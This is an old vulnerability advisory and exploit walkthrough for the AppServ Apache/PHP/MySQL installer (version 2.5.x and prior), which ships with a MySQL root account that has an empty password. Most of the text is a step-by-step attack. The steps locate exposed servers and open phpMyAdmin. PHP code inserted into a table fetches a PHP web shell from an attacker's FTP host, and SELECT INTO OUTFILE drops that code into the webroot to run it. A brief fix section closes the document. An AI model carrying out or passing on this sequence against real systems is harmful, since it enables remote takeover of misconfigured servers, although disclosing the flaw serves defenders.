what AppServ ========== AppServ is the Apache/PHP/MySQL open source software installer packages. Objective : - Easy to buid Webserver and Database Server - For those who just beginning client/server programming. - For web programmers/developers using PHP & MySQL. - For programming techniques that is easily to be ported to other platforms such as WindowZ - Single step installation , no need to perform multiple step, time consuming installation and configuration. - Ready-to-run just after you've finished installing.ready-to-run just after you've finished installing. - If you hate and boring M$ IIS Webserver. ===================================================== AppServ URL:http://www.appservnetwork.com Vulnerability Ver: 2.5.X and prior problem : ================================= the program comes in default user (Root) and empty password which let attacker to contrlor program and computer. ================================= Expliot Method 1)scan tool (SuperScan or whatever) this step to scan MySQL service on port 3306 2)when we found a serveic (MySQL on 3306) we can Reguest the IP from IE (Internet Explorer). >From IE we can request the Machain IP like( http://xxx.xxx.xxx.xxx) 3)if we success the index page for AppServ open 4)Now we can edit the databases and tables in Mysql by phpmyadmin >From IE (http://xxx.xxx.xxx.xxx/PhpMyAdmin) 5)default MySQL Server come with two database (test,mysql),our target is (mysql ). Now we can add new table contains our exploit - Create New table for example (exploit) with one fild and type TEXT -insert in database the exploit ( PHP code) like : ==============start================= <? $conn_id = ftp_connect("Evil_IP_or_Attacker_ip"); $login_result = ftp_login($conn_id, "Attacker", "Passwd"); $download = ftp_get($conn_id, "C:\AppServ\www\phpShell.php", "phpshell.php", FTP_BINARY); ftp_quit($conn_id); ?> ==============end===================== the attacker could use " Windows FTP Server" or any FTP daemon, it's not a matter :-) phpshell.php is a script function like (system,passthru,exec ...etc) you can find nice phpshell here (http://phpfm.sf.net ) the attacker could download EXE file else. 6)Now we are able to make a query to outfile by use INTO OUTFILE statement . SELECT * From exploit INTO OUTFILE 'C:\\AppServ\\www\\Query.php' 7)Query.php contain Our PHP code 8)if we success we can reguest (http://xxx.xxx.xxx.xxx/Query.php) 9)if FTP connection successful and downloaded phpshell.php in the victim PC you can send new request like: (http://xxx.xxx.xxx.xxx/phpshell.php) 10) Game's Over ================================================== Fix ===== 1)change Root passowrd 2)use firewall for aptche and MySQL Server 3)use Save Mode for your script ============================================================== discovered by Saudi Linux